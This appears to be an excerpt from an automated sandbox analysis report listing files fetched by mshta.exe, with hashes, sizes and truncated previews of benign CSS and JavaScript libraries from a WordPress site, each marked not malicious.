                                        SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                        MD5:124A9E7B6976F7570134B7034EE28D2B
                                        SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                        SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                        SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                        Malicious:false
                                        Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:GIF image data, version 89a, 36 x 38
                                        Category:dropped
                                        Size (bytes):1062
                                        Entropy (8bit):4.517838839626174
                                        Encrypted:false
                                        SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                        MD5:124A9E7B6976F7570134B7034EE28D2B
                                        SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                        SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                        SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                        Malicious:false
                                        Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):81132
                                        Entropy (8bit):4.724082147516296
                                        Encrypted:false
                                        SSDEEP:384:Cy1U1YB94h43181f4E4v2e2oPNPs0v424zVoVI4m48:71U1Q4h43181f4E4m0v424zVoVI4m48
                                        MD5:B7A9605E1633ACF8180CD3F6C604876D
                                        SHA1:3FF2D5FE95BD41130BFFDE2211B3CCD43716038A
                                        SHA-256:1CE4F92F822BDFBCCEAA71C2FCFE760F5228E445DE0C20AEABBB3D93DDDA2644
                                        SHA-512:66E085703BA9E14C49185FE35329469DE6BF3E4F6A2D3A3BFCDB52E79FAEC9E32657EF073A1F888AFB1A9309C38DC1F9B09F8FE95CF12A34C88782D683CDD52A
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20
                                        Preview:@charset "UTF-8";..../*!..Animate.css - http://daneden.me/animate..Version - 3.4.0..Licensed under the MIT license - http://opensource.org/licenses/MIT....Copyright (c) 2015 Daniel Eden..*/.....animated {.. -webkit-animation-duration: 1s;.. animation-duration: 1s;.. -webkit-animation-fill-mode: both;.. animation-fill-mode: both;..}.....animated.infinite {.. -webkit-animation-iteration-count: infinite;.. animation-iteration-count: infinite;..}.....animated.hinge {.. -webkit-animation-duration: 2s;.. animation-duration: 2s;..}.....animated.bounceIn,...animated.bounceOut {.. -webkit-animation-duration: .75s;.. animation-duration: .75s;..}.....animated.flipOutX,...animated.flipOutY {.. -webkit-animation-duration: .75s;.. animation-duration: .75s;..}....@-webkit-keyframes bounce {.. from, 20%, 53%, 80%, to {.. -webkit-animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000);.. animation-timing-function: cubic-bezier(0.215, 0.61
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):1789
                                        Entropy (8bit):5.215043597951395
                                        Encrypted:false
                                        SSDEEP:48:kMcpLsRsdpOIi0hwrtpsDrzdVv6I8ixCYk4f440T8BuP9n:e/+0AOrzdVvQqXwNp9n
                                        MD5:E7694C9876A74D8AF4840B08D8CC4364
                                        SHA1:3A301C6DFB6B691B0453CEB4A1065BD7C2A5BD8A
                                        SHA-256:9E806234DF297746D665A8E76B129BF708E4470D7A50FEF5905D306176BEA1C1
                                        SHA-512:12F2867F5D91CCD42F3893884BB5BDD1F25AE7024B7CEED9CBF108498EFA374B186C38209A6A0468A88D8A12C1F758E25FE5A081B76588A0BAED4B3A26EDEF51
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1
                                        Preview:jQuery(document).ready(function(){..// OWL Carousel init...cherryPluginCarouselInit();...// Full-width block with left-right paddings...jQuery('.content_box.full-width').wrapInner('<div class="full-block-wrap"></div>');..jQuery(window).resize( function(){...contenBoxResizeFunction();..});...contenBoxResizeFunction();..function contenBoxResizeFunction(){...var width_of_viewport = jQuery(window).width(),....half_width_of_viewport = width_of_viewport / 2,....width_of_container = jQuery('.content-holder > .container').width();....jQuery('.content_box.full-width').width(width_of_container);...jQuery('.content_box.full-width').css({'padding-left': half_width_of_viewport+'px', 'padding-right': half_width_of_viewport+'px', 'margin-left': '-'+half_width_of_viewport+'px'});...jQuery('.full-block-wrap').width(width_of_container);..}.});..function cherryPluginCarouselInit() {..jQuery('div[id^="owl-carousel-"]').each(function(){...var carousel = jQuery(this),....auto_play = parseInt(carousel.attr('
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):12158
                                        Entropy (8bit):3.592754771957016
                                        Encrypted:false
                                        SSDEEP:192:t3BO6DYHSCIGSNHsVgqdAy3Ho4y+JFynA/RMAPAdLP3fbXchcRiiAf:x3wgkdn4Chv
                                        MD5:9DFB3EE198D0B5AD45C2A0BCD6BF803B
                                        SHA1:C90AFF5CC613C7308E0AD69F62B31E19FEFEE4EF
                                        SHA-256:89FCE279C9EA9D6232EE5A76067340817EF1A0FD4555FAC18095A202BB6DA952
                                        SHA-512:1155CC8C04C090E7ADC600D3473C481C66041EBB60DDC8189754E6EC61AB49120F3F9505250FA2CFC164AA91F9863E3F4C405381568B33DAC8346D1BA8652F41
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0
                                        Preview:jQuery(document).ready(function($){. . parallax_box = $('section.parallax-box');. if(parallax_box.length > 0){. ParallaxBox();. }. . function ParallaxBox(). {. var windowSelector = $(window),. documentSelector = $(document),. documentWidth = documentSelector.width(),. windowHeight = windowSelector.outerHeight(),. liteMode = false,. ieVersion = getInternetExplorerVersion();. . var ds = document.documentElement;. . if(!device.mobile() && !device.tablet()){....liteMode = false;. . if (ieVersion !=-1 && ieVersion < 9){. liteMode = true;. }...}else{....liteMode = true;...}. . parallax_box.each(function(). {. parallaxBox($(this));. });. . function parallaxBox(obj){. . var obj_bg = obj.find('.parallax-bg'),. type = obj_bg.data('parall
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):2778
                                        Entropy (8bit):4.92970371310333
                                        Encrypted:false
                                        SSDEEP:48:xLnN+tyKOxwaPYuxwFAmKldNzr1JhxPE63haDJ77LMeHrc76cCgP:hTPCoEt6
                                        MD5:CCD1C11A6BA5DF0CBFC470B04A3739F4
                                        SHA1:A8864D81DE7689672EF8F916E430AAABF563C22D
                                        SHA-256:A6BA246C6B7B60AFFBB369C8884D172DD3E4702A594F09BBA678A7773A25E411
                                        SHA-512:31F7B74A31E796534D0F51BD9BC9004BDD30EE896D987300A220DADAA526753C9C6D00081F4E9D18EA2BF875C776D6ED55CBA62404B22534BCD45A277EC45A79
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0
                                        Preview:/*! device.js 0.1.58 */.(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.iphone=function(){return d("iphone")},device.ipod=function(){return d("ipod")},device.ipad=function(){return d("ipad")},device.android=function(){return d("android")},device.androidPhone=function(){return device.android()&&d("mobile")},device.androidTablet=function(){return device.android()&&!d("mobile")},device.blackberry=function(){return d("blackberry")||d("bb10")||d("rim")},device.blackberryPhone=function(){return device.blackberry()&&!d("tablet")},device.blackberryTablet=function(){return device.blackberry()&&d("tablet")},device.windows=function(){return d("windows")},device.windowsPhone=function(){return device.windows()&&d("phone")},device.windowsTablet=function(){return device.windows()&&d("touch")},device.fxos=function(){return(
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1706
                                        Entropy (8bit):5.274543201400288
                                        Encrypted:false
                                        SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                        MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                        SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                        SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                        SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                        Malicious:false
                                        Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):1706
                                        Entropy (8bit):5.274543201400288
                                        Encrypted:false
                                        SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                        MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                        SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                        SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                        SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                        Malicious:false
                                        IE Cache URL:res://ieframe.dll/error.js
                                        Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):693
                                        Entropy (8bit):4.934608717734217
                                        Encrypted:false
                                        SSDEEP:12:4IYVc5Y6ls3SFy4n51hHSs5n8oD6jc5n8JH6uDvKROYABO0b2TLx3OsqTLxN8QOX:4IYVc5Y6B51hys5n8G6jc5n8JH6uDvKX
                                        MD5:9B0F26CF8D22D4E9455F67B21C2F9759
                                        SHA1:F0240A4411D4A2EB073C574D37618E503392B76E
                                        SHA-256:226456D9A9EEF8F0831B6B181BE100A49CBAEC1651A8BD45D7D0CC897D161538
                                        SHA-512:FB5BA2942B79906FD59181F39F3C753D9950AB5502A56A3D164DFF50516CC70149EA68D3478F4B7ADC09E7FB67FD8519FF83EFD5089FA51B1B85400C50641D4B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20
                                        Preview:a.gflag {font-size:24px;padding:1px 0;background-repeat:no-repeat;background-image:url(24.png);}.a.gflag img {border:0;height:24px;display:inline;}.a.gflag:hover {background-image:url(24a.png);}.img.gstats {display:none;}.a.alt_flag {background-image:url(alt_flags.png);}.a.alt_flag:hover {background-image:url(alt_flagsa.png);}.a.us_flag {background-position:-0px -100px;}.a.br_flag {background-position:-100px -100px;}.a.mx_flag {background-position:-200px -100px;}..a.glink {text-decoration:none;}.a.glink span {margin-right:5px;font-size:15px;vertical-align:middle;}.a.glink img {vertical-align:middle;display:inline;border:0;padding:0;margin:0;opacity:0.8;}.a.glink:hover img {opacity:1;}
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, UTF-8 Unicode text, with very long lines
                                        Category:downloaded
                                        Size (bytes):94840
                                        Entropy (8bit):5.372946098601679
                                        Encrypted:false
                                        SSDEEP:1536:8YRKUfAjtledhTmtaFyQHGvCXsedOgRc9izzr4yff8teLvHHEjam7W5X3yzSiLnM:VUb6GvCu09s2o2skAieW
                                        MD5:B8D64D0BC142B3F670CC0611B0AEBCAE
                                        SHA1:ABCD2BA13348F178B17141B445BC99F1917D47AF
                                        SHA-256:47B68DCE8CB6805AD5B3EA4D27AF92A241F4E29A5C12A274C852E4346A0500B4
                                        SHA-512:A684ABBE37E8047C55C394366B012CC9AE5D682D29D340BC48A37BE1A549AECED72DE6408BEDFED776A14611E6F3374015B236FBF49422B2982EF18125FF47DC
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2
                                        Preview:/*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):3300
                                        Entropy (8bit):5.21640221299254
                                        Encrypted:false
                                        SSDEEP:96:daBwwfAxMF8qm9FUAm1Cal7yS06jfkOA/W50UdDiAAlZd:sO2AxMF8qm9Wdcal7yS06jfkOGW50Ud6
                                        MD5:3720B3CCB887382D0716A49CC52D7901
                                        SHA1:AEB99C65DFE7E6BA2931AFD762E53579FE372CCD
                                        SHA-256:605B6FE57753665BD450CCC691B2B32EB508F05D8CB9BD3747D8F37C808990B1
                                        SHA-512:B7F89F83B51132C5D66E59FEC1DA6793638360B6691151C54D9799E0B58FB2D9E722A48E3014520628EC0771C2BB9703CFE9676DADE5E9F9BA010C62701CCC44
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3
                                        Preview:jQuery.easing.jswing=jQuery.easing.swing;.jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(e,a,c,b,d){return jQuery.easing[jQuery.easing.def](e,a,c,b,d)},easeInQuad:function(e,a,c,b,d){return b*(a/=d)*a+c},easeOutQuad:function(e,a,c,b,d){return-b*(a/=d)*(a-2)+c},easeInOutQuad:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a+c:-b/2*(--a*(a-2)-1)+c},easeInCubic:function(e,a,c,b,d){return b*(a/=d)*a*a+c},easeOutCubic:function(e,a,c,b,d){return b*((a=a/d-1)*a*a+1)+c},easeInOutCubic:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a*a+c:.b/2*((a-=2)*a*a+2)+c},easeInQuart:function(e,a,c,b,d){return b*(a/=d)*a*a*a+c},easeOutQuart:function(e,a,c,b,d){return-b*((a=a/d-1)*a*a*a-1)+c},easeInOutQuart:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a*a*a+c:-b/2*((a-=2)*a*a*a-2)+c},easeInQuint:function(e,a,c,b,d){return b*(a/=d)*a*a*a*a+c},easeOutQuint:function(e,a,c,b,d){return b*((a=a/d-1)*a*a*a*a+1)+c},easeInOutQuint:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a*a*a*a+c:b/2*((a-=2)*a*a*a*a+2)+c}
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):6240
                                        Entropy (8bit):5.090536443525485
                                        Encrypted:false
                                        SSDEEP:96:zFWtrmc8bxAo69U8Rb93DCb/f+jrJ6Xj/vBQ61:LW3xgYMn/
                                        MD5:EAC02BD7783EDAB0F1A0DBEBB32AA8A7
                                        SHA1:D8D25DFF1DA53BE5A8D200D0BA59944C1FA7281D
                                        SHA-256:DADD36769DECA1A3720B875DE9624093AE6623DAEBFC5A13061E129C61DFEA24
                                        SHA-512:D1DD6D2F1CDB7EEEAA3396578038448A2337AB0EFACF884E624D459F1E9870A709C9A18D576327C62DEABB8363C643ED302E3CA4FAC3EAD2C7C82713E58F663B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1
                                        Preview:(function(j,c,l){c.fn.touchwipe=function(a){var b={min_move_x:20,min_move_y:20,wipeLeft:function(){},wipeRight:function(){},wipeUp:function(){},wipeDown:function(){},preventDefaultEvents:!0};a&&c.extend(b,a);this.each(function(){function a(){this.removeEventListener("touchmove",c);d=null;k=!1}function c(h){b.preventDefaultEvents&&h.preventDefault();if(k){var f=d-h.touches[0].pageX;h=e-h.touches[0].pageY;Math.abs(f)>=b.min_move_x?(a(),0<f?b.wipeLeft():b.wipeRight()):Math.abs(h)>=b.min_move_y&&(a(),.0<h?b.wipeDown():b.wipeUp())}}function f(a){1==a.touches.length&&(d=a.touches[0].pageX,e=a.touches[0].pageY,k=!0,this.addEventListener("touchmove",c,!1))}var d,e,k=!1;"ontouchstart"in document.documentElement&&this.addEventListener("touchstart",f,!1)});return this};c.elastislide=function(a,b){this.$el=c(b);this._init(a)};c.elastislide.defaults={speed:450,easing:"easeOutBack",imageW:190,margin:3,border:2,minItems:1,current:0,onClick:function(){return!1}};c.elastislide.prototype={_init:function
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):1392
                                        Entropy (8bit):5.304639490555412
                                        Encrypted:false
                                        SSDEEP:24:JNFww5yF1TY6APXYBfQJbHLcIYADqfIO0hz7aUIONhM7v9O9BK8:JbCsPXYBfQuIIkhzGUdhMLYLK8
                                        MD5:25DB04E9DAEE1C00F6CA337537C32C01
                                        SHA1:CC1D92C5536C9B2DD766B6EDDC0C8BA8CF831438
                                        SHA-256:C8104390115F92B27003B1E4E503EF59343CCFEF4AC19751093544E8CFAEAE26
                                        SHA-512:F5BCA70968AB8D030218485A4417E2AF39621F7E7DF150C9BCA84281801CA5A43B55759844D677626A5FF53BAD4C049C995E0DB72CB4B549766628718DE9E518
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6
                                        Preview:/*! Copyright (c) 2011 Brandon Aaron (http://brandonaaron.net). * Licensed under the MIT License (LICENSE.txt).. *. * Thanks to: http://adomas.org/javascript-mouse-wheel/ for some pointers.. * Thanks to: Mathias Bank(http://www.mathias-bank.de) for a scope bug fix.. * Thanks to: Seamus Leahy for adding deltaX and deltaY. *. * Version: 3.0.6. * . * Requires: 1.2.2+. */.(function(a){function d(b){var c=b||window.event,d=[].slice.call(arguments,1),e=0,f=!0,g=0,h=0;return b=a.event.fix(c),b.type="mousewheel",c.wheelDelta&&(e=c.wheelDelta/120),c.detail&&(e=-c.detail/3),h=e,c.axis!==undefined&&c.axis===c.HORIZONTAL_AXIS&&(h=0,g=-1*e),c.wheelDeltaY!==undefined&&(h=c.wheelDeltaY/120),c.wheelDeltaX!==undefined&&(g=-1*c.wheelDeltaX/120),d.unshift(b,e,g,h),(a.event.dispatch||a.event.handle).apply(this,d)}var b=["DOMMouseScroll","mousewheel"];if(a.event.fixHooks)for(var c=b.length;c;)a.event.fixHooks[b[--c]]=a.event.mouseHooks;a.event.special.mousewheel={setup:function(){if(this.addEventListener)f
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):946
                                        Entropy (8bit):5.1855423510973475
                                        Encrypted:false
                                        SSDEEP:24:2GPs6G3ILAMbiEm8QKov1mxulWM8cQ2x17JxrIv:24EMeLQxuj8cQUjVS
                                        MD5:72944D2F940D2AB8DFDCAA537A9ECDEE
                                        SHA1:D94FA468B83F9B76EB8F97CEFC6312FBD173A848
                                        SHA-256:547887F6237649D22B102EDD455869D14A02D3B393CFF5A5886624E4D08DCB3A
                                        SHA-512:58D77C35684959DBF8B70452CA0D74AE94233055959A3663C44CEC2511045E9BE4665C7F02A0E1DB1B8F2209BD89089FE438EB51F36257F832EC707BC4419C4E
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0
                                        Preview:/* jquery.simplr.smoothscroll version 1.0 copyright (c) 2012 https://github.com/simov/simplr-smoothscroll licensed under MIT */..jQuery(document).ready(function($) {. if(!device.mobile() && !device.tablet()){. $.srSmoothscroll({. step:150,. speed:800. });. }.});..;(function(e){"use strict";e.srSmoothscroll=function(t){var platform = window.navigator.platform; if ((platform === 'MacIntel' || platform === 'MacPPC')){return false}; var n=e.extend({step:170,speed:1000,ease:"swing"},t||{});var r=e(window),i=e(document),s=0,o=n.step,u=n.speed,a=r.height(),f=navigator.userAgent.indexOf("AppleWebKit")!==-1?e("body"):e("html"),l=false;e("body").mousewheel(function(e,t){l=true;if(t<0)s=s+a>=i.height()?s:s+=o;else s=s<=0?0:s-=o;f.stop().animate({scrollTop:s},u,n.ease,function(){l=false});return false});r.on("resize",function(e){a=r.height()}).on("scroll",function(e){if(!l)s=r.scrollTop()})}})(jQuery);.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):5372
                                        Entropy (8bit):4.984476165106454
                                        Encrypted:false
                                        SSDEEP:96:AJKII0S0eTHhUELNZQety9Q2dJie/JTwJTG/JiGS61iL0:iQQBSw
                                        MD5:3A2087F6BBC2271D1A7484512C92A4BB
                                        SHA1:B15329AD5E236432E2B7972242E3DDC0E93BE73A
                                        SHA-256:D836BDB6405A34D357393B88B95298C535A088D8DF6F84805B8290182CD7EF13
                                        SHA-512:9FCDEBC1712A9666A9CC7DD7BB505B6B4369224653C542854FECEBD073C83A9C228F80A9D5A3B61BE9836DFFF2692DBEF9DE949542CEF6251ED74E2589374612
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0
                                        Preview:/**. * All of the CSS for your public-facing functionality should be. * included in this file.. */..lgx-logo-slider-wp .owl-stage {. display: flex;. align-items: center;.}...lgx-logo-slider-wp .lgx-logo-wrapper {. padding: 25px 0;.}..lgx-logo-slider-wp .lgx-logo-wrapper .lgx-logo-carousel .owl-nav {. text-align: center;.}..lgx-logo-slider-wp .lgx-logo-wrapper .lgx-logo-carousel .owl-nav .owl-next,..lgx-logo-slider-wp .lgx-logo-wrapper .lgx-logo-carousel .owl-nav .owl-prev {. margin: 1px;.}..lgx-logo-slider-wp .lgx-logo-wrapper .lgx-logo-carousel .owl-nav [class*=owl-] {. background: transparent;.}..lgx-logo-slider-wp .lgx-logo-wrapper .lgx-logo-carousel .owl-next img,..lgx-logo-slider-wp .lgx-logo-wrapper .lgx-logo-carousel .owl-prev img {. width: 30px;.}..lgx-logo-slider-wp .wp-logo-border .lgx-logo-item {. border-style: solid;. border-width: 2px;.}..lgx-logo-slider-wp .lgx-logo-item {. cursor: pointer;. text-align: center;.}..lgx-logo-slider-wp .lgx-logo-item .logo-com
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):21945
                                        Entropy (8bit):4.998283618348646
                                        Encrypted:false
                                        SSDEEP:384:vDi+XnHtUrZKt+uSmu+c30r8SGCxGfGYb/0EUN0QT0z8lFLiFHM:LiOnHtUrZKtqOI0ISGCxGfGYb/0Ery0C
                                        MD5:56879E9EF909D5CF8DEF84297B5AC6B4
                                        SHA1:097D5726A7053C1E9E20FCFE6FFA771F2D6DE573
                                        SHA-256:8A1D0F12B448B5065CBE1E76F5D2DF0364E9E9A2CAE98E9419215CAD62FB1892
                                        SHA-512:E7ACA508BE1EB31411887C3DD64ABBC47AB39C3C217E924D89245A084404AF350C2B6693721BD06CF9CCF8DE263189BC2C80FD1C1E86A8D10147FBC27FF7770B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.css
                                        Preview:/*!. * Bootstrap Responsive v2.3.0. *. * Copyright 2012 Twitter, Inc. * Licensed under the Apache License v2.0. * http://www.apache.org/licenses/LICENSE-2.0. *. * Designed and built with all the love in the world @twitter by @mdo and @fat.. */..clearfix {. *zoom: 1;.}..clearfix:before,..clearfix:after {. display: table;. content: "";. line-height: 0;.}..clearfix:after {. clear: both;.}..hide-text {. font: 0/0 a;. color: transparent;. text-shadow: none;. background-color: transparent;. border: 0;.}..input-block-level {. display: block;. width: 100%;. min-height: 30px;. -webkit-box-sizing: border-box;. -moz-box-sizing: border-box;. box-sizing: border-box;.}.@-ms-viewport {. width: device-width;.}..hidden {. display: none;. visibility: hidden;.}..visible-phone {. display: none !important;.}..visible-tablet {. display: none !important;.}..hidden-desktop {. display: none !important;.}..visible-desktop {. display: inherit !important;.}.@media (min-width: 768px) and (ma
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):16845
                                        Entropy (8bit):4.927428585989144
                                        Encrypted:false
                                        SSDEEP:192:7MFuCes2ba6PZqwJPWeitF0faGG27acPpqiJXWYi1F+f8imVjFuXQT3XerQCTQW+:qFJXerQCFPKT/ob0JMSP
                                        MD5:02BACBAD1E26F0B3D1772D4CF5A047DC
                                        SHA1:89292741D360F7EB3319437CD32A80EA7B388941
                                        SHA-256:DF15236D4098113E3479FC540A9BD1046CA6029F5508098E9C4245A0E12FAB05
                                        SHA-512:4F2F5BD7AA47FAD34B3337ADA2F0C5411702A7046E6A65FDA97BB4E13EFFC05C30261C7EF27BECB4F5F0AC4E98F234B6EC81C900AAD7C12FD9D6FED844BB8A6D
                                        Malicious:false
